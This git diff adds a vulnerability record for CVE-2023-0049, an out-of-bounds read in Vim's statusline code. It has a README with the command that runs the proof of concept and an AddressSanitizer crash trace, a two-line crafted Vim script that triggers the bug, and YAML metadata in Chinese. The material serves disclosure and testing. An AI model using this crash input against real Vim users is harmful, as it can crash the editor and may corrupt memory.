diff --git a/cve/vim/2023/CVE-2023-0049/README.md b/cve/vim/2023/CVE-2023-0049/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..9ff5e370f5b024a29076093745a14f23f9d5eaef
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0049/README.md
@@ -0,0 +1,118 @@
+# 漏洞CVE-2023-0049
+Out-of-bounds Read in function build_stl_str_hl at buffer.c:4350
+
+## vim version
+
+```shell
+git log
+commit ea720aea851e645f4c8ec3b20afb27c7ca38184c (HEAD -> master, tag: v9.0.1137, origin/master, origin/HEAD)
+```
+
+## Proof of Concept
+```shell
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hor01_s.dat -c :qa!
+=================================================================
+==2441==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006eb5 at pc 0x00000052f7a2 bp 0x7ffd0ecb2570 sp 0x7ffd0ecb2568
+READ of size 1 at 0x602000006eb5 thread T0
+    #0 0x52f7a1 in build_stl_str_hl /home/fuzz/vim/src/buffer.c:4350:22
+    #1 0xe6d8cf in win_redr_custom /home/fuzz/vim/src/screen.c:1104:13
+    #2 0x6748f7 in redraw_custom_statusline /home/fuzz/vim/src/drawscreen.c:591:5
+    #3 0x6726fa in win_redr_status /home/fuzz/vim/src/drawscreen.c:461:2
+    #4 0x67ca0b in redraw_statuslines /home/fuzz/vim/src/drawscreen.c:3307:6
+    #5 0x14bb8f8 in main_loop /home/fuzz/vim/src/main.c:1428:6
+    #6 0x8943d2 in open_cmdwin /home/fuzz/vim/src/ex_getln.c:4546:5
+    #7 0x879ed4 in getcmdline_int /home/fuzz/vim/src/ex_getln.c:1935:7
+    #8 0x8746ce in getcmdline /home/fuzz/vim/src/ex_getln.c:1551:12
+    #9 0xb8ccf8 in nv_search /home/fuzz/vim/src/normal.c:4138:22
+    #10 0xb62f4b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+    #11 0x83d7ae in exec_normal /home/fuzz/vim/src/ex_docmd.c:8888:6
+    #12 0x83cfd8 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8851:5
+    #13 0x83cb89 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8769:6
+    #14 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #15 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #16 0xea0575 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+    #17 0xe9cfd6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+    #18 0xe9c90c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+    #19 0xe9bfee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+    #20 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #21 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #22 0x7f65d1 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:588:12
+    #23 0x14b9732 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+    #24 0x14b58ce in vim_main2 /home/fuzz/vim/src/main.c:782:2
+    #25 0x14aad69 in main /home/fuzz/vim/src/main.c:433:12
+    #26 0x7efd4f54b082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+    #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x602000006eb5 is located 0 bytes to the right of 5-byte region [0x602000006eb0,0x602000006eb5)
+allocated by thread T0 here:
+    #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
+    #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
+    #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
+    #3 0xfd7296 in vim_strsave /home/fuzz/vim/src/strings.c:27:9
+    #4 0xe6d865 in win_redr_custom /home/fuzz/vim/src/screen.c:1103:11
+    #5 0x6748f7 in redraw_custom_statusline /home/fuzz/vim/src/drawscreen.c:591:5
+    #6 0x6726fa in win_redr_status /home/fuzz/vim/src/drawscreen.c:461:2
+    #7 0x67ca0b in redraw_statuslines /home/fuzz/vim/src/drawscreen.c:3307:6
+    #8 0x14bb8f8 in main_loop /home/fuzz/vim/src/main.c:1428:6
+    #9 0x8943d2 in open_cmdwin /home/fuzz/vim/src/ex_getln.c:4546:5
+    #10 0x879ed4 in getcmdline_int /home/fuzz/vim/src/ex_getln.c:1935:7
+    #11 0x8746ce in getcmdline /home/fuzz/vim/src/ex_getln.c:1551:12
+    #12 0xb8ccf8 in nv_search /home/fuzz/vim/src/normal.c:4138:22
+    #13 0xb62f4b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+    #14 0x83d7ae in exec_normal /home/fuzz/vim/src/ex_docmd.c:8888:6
+    #15 0x83cfd8 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8851:5
+    #16 0x83cb89 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8769:6
+    #17 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #18 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #19 0xea0575 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+    #20 0xe9cfd6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+    #21 0xe9c90c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+    #22 0xe9bfee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+    #23 0x804e61 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2581:2
+    #24 0x7f1885 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:994:17
+    #25 0x7f65d1 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:588:12
+    #26 0x14b9732 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+    #27 0x14b58ce in vim_main2 /home/fuzz/vim/src/main.c:782:2
+    #28 0x14aad69 in main /home/fuzz/vim/src/main.c:433:12
+    #29 0x7efd4f54b082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/vim/src/buffer.c:4350:22 in build_stl_str_hl
+Shadow bytes around the buggy address:
+  0x0c047fff8d80: fa fa 02 fa fa fa 00 02 fa fa 01 fa fa fa 07 fa
+  0x0c047fff8d90: fa fa 01 fa fa fa 01 fa fa fa 05 fa fa fa 01 fa
+  0x0c047fff8da0: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 02 fa
+  0x0c047fff8db0: fa fa 07 fa fa fa 02 fa fa fa 00 03 fa fa 00 fa
+  0x0c047fff8dc0: fa fa 05 fa fa fa 01 fa fa fa 00 07 fa fa 07 fa
+=>0x0c047fff8dd0: fa fa 01 fa fa fa[05]fa fa fa fd fd fa fa 00 03
+  0x0c047fff8de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c047fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c047fff8e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c047fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c047fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==2441==ABORTING
+
+```
+
+## impact
+
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-0049/poc_hor01_s.dat b/cve/vim/2023/CVE-2023-0049/poc_hor01_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..d31cfee68ed72dea461c51cc75393b686db85261
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0049/poc_hor01_s.dat
@@ -0,0 +1,2 @@
+se tw=0 stl:%!%0
+sil0norm0q/
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0049.yaml b/cve/vim/2023/yaml/CVE-2023-0049.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..f6de7b6b07d3cd6130f4eeddaf63f90a5d4b973e
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0049.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-0049
+source: https://huntr.dev/bounties/5e6f325c-ba54-4bf0-b050-dca048fd3fd9/
+info:
+  name: Vim是一款跨平台的文本编辑器。
+  severity: high
+  description: |
+    Vim 9.0.1143之前版本存在缓冲区错误漏洞，该漏洞源于存在越界读取问题。
+  scope-of-influence:
+    vim < 9.0.1143
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0049
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0049
+    cwe-id: CWE-125
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 缓冲区错误
+  
\ No newline at end of file